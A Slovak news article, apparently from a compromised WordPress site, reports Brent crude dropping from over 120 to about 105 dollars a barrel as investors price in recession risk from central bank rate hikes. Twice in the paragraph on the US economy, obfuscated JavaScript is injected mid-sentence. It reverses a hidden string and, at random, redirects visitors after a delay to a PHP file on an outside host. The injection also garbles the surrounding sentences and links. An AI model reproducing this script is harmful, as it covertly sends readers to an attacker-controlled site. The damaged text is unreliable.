Ceny ropy Brent sa v poslednom týždni vydali na zostupnú dráhu.

Ropa počas týždňa zlacnila o desatinu. Investori započítavajú riziko ekonomickej recesie

Ceny ropy Brent sa v poslednom týždni vydali na zostupnú dráhu. Zatiaľ čo sa barel ešte nedávno predával za viac ako 120 dolárov, vo štvrtok dopoludnia jeho cena klesla k 105 dolárom. Neskôr však mierne spevnila.

Hospodárska recesia v USA

Investori začínajú do svojich rozhodovaní započítavať riziko hospodárskej recesie, ktoré sa v posledných týždňoch výrazne zvýšilo. Týka sa to predovšetkým amerického hospodárstva, a to kvôli razantným opatreniam Federálneho rezervného systému proti inflácii, ktorá v $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domacnosti-v-usa-su-najvyssie-za-desat-rokov/“>USA vystúpila na 40-ročné maximum. $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolar-je-voci-kosu-mien-najsilnejsi-za-posledne-dva-roky-aj-vdaka-spekulaciam-co-urobi-fed/“ target=“_blank“ rel=“noreferrer noopener“>Fed už niekoľkokrát zvýšil svoju základnú úrokovú sadzbu a k ďalším krokom tohto typu pristúpi v nasledujúcich mesiacoch.

Mierny rast alebo recesia pre globálnu ekonomiku

K Fedu sa už pridala aj Bank of England a v najbližších týždňoch by sadzbu mala zvýšiť aj Európska centrálna banka. To zvyšuje pravdepodobnosť, že sa globálna ekonomika dostane v lepšom prípade na výrazne slabšiu mieru hospodárskeho rastu, v horšom dokonca dôjde k recesii. Na každý pád investori počítajú so slabším rastom dopytu po rope, a preto klesla jej cena. Napriek tomu sa zatiaľ pod 100-dolárovú hranicu nepozrieme, pretože severná pologuľa stojí pred vrcholom motoristickej a turistickej sezóny.

4 komentáre

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *